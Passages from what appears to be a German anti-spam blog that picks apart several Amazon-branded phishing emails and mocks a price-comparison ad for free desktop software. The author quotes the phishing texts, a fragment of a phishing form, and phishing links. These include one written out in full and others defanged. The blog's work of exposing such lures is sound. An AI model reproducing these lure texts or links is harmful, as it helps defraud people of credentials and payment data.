style="top: -123px; height: 20px; left: -890px; width: 165px;"
id="submit" name="submit" value="" type="submit">
</form>

…wird an eine deutlich weniger Vertrauen erweckende Domain gesendet. Aber das ist ja auch gar keine Überraschung, denn es handelt sich um eine Spam.

Und nein: Es kann nicht dazu kommen, dass eine ähnliche Mail einmal „echt“ ist. Solche E-Mails sind immer Phishing-Versuche. Amazon versendet keine E-Mail mit Anhängen, in denen Formulare liegen, in denen der Empfänger sein Passwort eingeben soll, und übrigens auch keine mit Links auf derartige Formulare. Und genau das Gleiche gilt für jeden anderen Anbieter von Webdiensten. Und natürlich auch für jede Bank. Und einfach nur generell. Die einzigen Menschen, die so etwas machen, sind Kriminelle.

Es ist also gar nicht so schwierig, nicht darauf hereinzufallen.

Selbst, wenn man sich einmal unsicher ist, sollte eine E-Mail niemals ein Grund zu panischem Geklicke werden, denn Kriminelle verstehen sich darauf, Menschen zu überrumpeln. Sie leben schließlich davon, dass ihre fiesen Tricks zumindest manchmal funktionieren. Immer vor dem Klick nachdenken. Und im Zweifelsfall einfach rückfragen.

Sobald Sie dies tun, werden Sie Ihr Konto wieder verwenden, um Produkte auf Amazon Europa zu verkaufen!

Freundliche Muller,
Das Amazon Services Team

Freundliche was? :mrgreen:

Wenn Sie solche E-Mails nicht mehr erhalten mцchten, kцnnen Sie sich hier abmelden.

Ist ja schon ein bisschen peinlich, wenn man dabei den Link vergisst, nicht?

Aber der Kriminelle hat seine eigentliche „Botschaft“ ja rübergebracht, und jetzt ist er mit seinen Gedanken schon wieder bei den Nutten, so dass die Sorgfalt für eher formale, unwichtige Dinge eben nachlässt. Wenn man darauf achtet, kann man derartige Fehler in sehr vielen Spams sehen. Wenn sich der Spammer Mühe geben wollte, könnte er ja gleich arbeiten gehen.

© 2016 Amazon.com Inc. oder Tochtergesellschaften. Alle Rechte vorbehalten. Amazon Services Europe S.а r.l. 5 Rue Plaetis L-2338 Luxembourg, Handelsregisternummer Luxemburg: B-93815, Gesellschaftskapital 37.500 EUR, Gewerbelizenznummer: 100416, USt.-Identifikationsnummer Luxemburg: LU 19647148.

Nein, diese Spam wurde von einer dynamischen IP-Adresse eines Kunden bei einem Telekommunikationsanbieter aus Arizona, USA versendet; mit an Sicherheit grenzender Wahrscheinlichkeit handelt es sich um einen mit Schadsoftware feindselig übernommenen Rechner, der Teil eines Botnetzes ist. Diese Spam hat niemals einen Server von Amazon gesehen.

Einmal ganz davon abgesehen, dass beanspruchtes „geistiges Eigentum“ für eine automatisch erstellte E-Mail ein geistiger Dünnpfiff ist, auf den kaum noch eine Satire möglich ist. Aber das machen leider nicht nur Spammer, sondern auch andere Idioten.

¹Ich weiß, das hier keine Schadsoftware enthalten ist, weil ich mir den Quelltext des angehängten HTML-Dokumentes angeschaut habe. Es gibt keine andere Möglichkeit, das herauszubekommen. Ein Antivirus-Programm versagt regelmäßig, wenn es mit den neuesten Entwicklungen der Kriminellen konfrontiert ist.

Neue Nachricht

Mittwoch, 24. Februar 2016

Oh, im Honigtöpfchen. Mit Qualitätsbetreff. Denn dass eine neue Nachricht angekommen ist, sehe ich ja in der Auflistung meiner E-Mail.

Sehr geehrter kunde Verkäufer,

Und der Absender, der übrigens behauptet, „Amazon“ zu sein, kennt sogar meinen Vornamen und meinen Nachnamen! :mrgreen:

Es sind weitere Informationen erforderlich, damit Ihr „Verkaufen bei Amazon“-Zahlungskonto eröffnet werden kann.

Solange diese Angaben fehlen, können Sie leider nicht bei Amazon verkaufen.
Klicken Sie bitte hier um die Informationen bereitzustellen.

Der Link geht natürlich nicht in die Domain von Amazon, sondern in die weniger Vertrauen erweckende Domain boudewijn (punkt) webplays (punkt) eu. Dort hätte man sicherlich Gelegenheit erhalten, ganz viele Daten auf einer Website einzugeben, die zur Täuschung mit einem Amazon-Logo dekoriert wurde – und sie anschließend mit einem Klick direkt an Gangster aus der Organisierten Kriminalität zu übertragen. Die freuen sich über alles, von Anschrift und Geburtsdatum für den Identitätsmissbrauch bis hin zu Kreditkartendaten für das Einkaufen mit dem Geld anderer Leute. Zum Glück wurde der kriminelle Müll bereits vom Server entfernt.

Diese EMail wird automatisch gesendet – antworten sie nicht.
Dieses Postfach wird nicht überwacht, und sie werden keine antwort bekommen.

Der Absender dieser Spam ist gefälscht.

Hey, Spammer! Wenn ihr mit so einer primitiven Phishing-Nummer durchkommen wollt, müsst ihr die Sprache, in der ihr schreibt, schon etwas besser beherrschen… ach, zu viel Mühe?! Tja, wenn ihr euch Mühe geben würdet, brauchtet ihr ja auch nicht zu spammen…

Jetzt noch günstiger als kostenlos!

Mittwoch, 16. September 2015

Immer wieder hübsch, wenn man normale, legale Werbung im Web kaum noch von der Spam unterscheiden kann:

Screenshot eines Ads: Preisvergleich ist unsere Stärke! Kde Gnome noch günstiger. www punkt guenstiger punkt de | Produkte vergleichen

Screenshot via @benediktg@gnusocial.de

Wer nicht sofort versteht, wie lächerlich diese spamartig geschalteten Ads eines Preisvergleich-Portals sind: Sowohl KDE als auch GNOME sind freie Desktop-Projekte für unixoide Betriebssysteme, die völlig kostenlos bezogen werden können.

Was derartig intelligenzverachtende und spamnahe Werbemethoden über die „Preisvergleiche“ beim Anbieter unter der Domain www (punkt) guenstiger (punkt) de aussagen, überlasse ich der individuellen Urteilsfindung jedes einzelnen Hirnträgers. Kleiner Tipp: Ich halte das für eine Empfehlung, und zwar nicht für eine zur Nutzung. ;)

Nachtrag ohne weitere Worte:amazon-KDE

Amazon Konto Verifikation!

Freitag, 5. Juni 2015

Diese Mail fällt nicht nur wegen ihres doofen Betreffs auf, sondern auch dadurch, dass 461 Mailadressen als Empfänger eingetragen sind, was natürlich den gewünschten Eindruck von „Amazon schreibt mich an, weils ein Problem mit meinem Account gibt“ zerstört. Die tiefere Bedeutung der Header-Zeile BCC muss sich der Spammer noch einmal von einem Achtjährigen erklären lassen.

Der Text ist dann auch genau so doof, wie es diese Mail schon auf dem ersten Blick verspricht:

Hallo lieber Amazon User ,
Sie müssen eine Verifikation Durchführen , weil leider alle Amazon
Daten Verloren Gingen.
Wir bitten sie auf der Angegebenen Webseite ( Siehe Unten ) , Den Link
zu öffnen , und sich dort einzuloggen und ihre daten erneut ein zu
geben.

Der Link zur Verifikation:
http://amzn.co.at/index/?[ID entfernt]

Mit Freundlichen Grüßen,
Ihr Amazon CO Team.

So so, leider sind alle Amazon-Daten verlorengegangen… :D

Gut, dass darauf niemand reinfallen kann, weil es so krachend dumm ist!

Die verlinkte Website „verzichtet“ auf normales HTML und erzeugt ihre „Inhalte“ aus mit Javascript entschlüsselten, zuvor verschlüsselten Daten. :shock:

Das ist natürlich ein bisschen… verdächtig, denn ein Phisher brauchte sich niemals solche Mühe zu geben. Mit an Sicherheit grenzender Wahrscheinlichkeit handelt es sich hier um einen Versuch, dem Besucher Schadsoftware zu installieren. Ich bin gerade viel zu unmotiviert, die vorsätzlich kryptischen Methoden zu analysieren, um nachzuschauen, was genau getan wird und ob es am Ende wenigstens zum Schein noch eine Phishing-Seite gibt und begnüge mich mit der Einsicht, dass dumm formulierte und technisch mies gemachte Phishing-Spams zurzeit manchmal auf perfide ausgearbeitete und wahrscheinlich hochinfektiöse Seiten führen. Oder: Auch den scheinbar dümmsten Spammer darf man nie unterschätzen.

Und deshalb klickt man niemals, niemals, niemals in eine Spam – und erlaubt auch generell nicht jeder dahergelaufenen Website die Ausführung von Javascript-Code im Browser. Ein Browser-Addon wie NoScript ist eine unverzichtbare Sicherheitssoftware, die derartige Angriffe an der Wurzel verhindert, selbst, wenn die Schadsoftware so aktuell sein sollte, dass der Virenscanner keine Chance hätte.

Diese Spam aus dem Beklopptenbrutschrank des Internet ist ein Zustecksel meines Lesers E.T.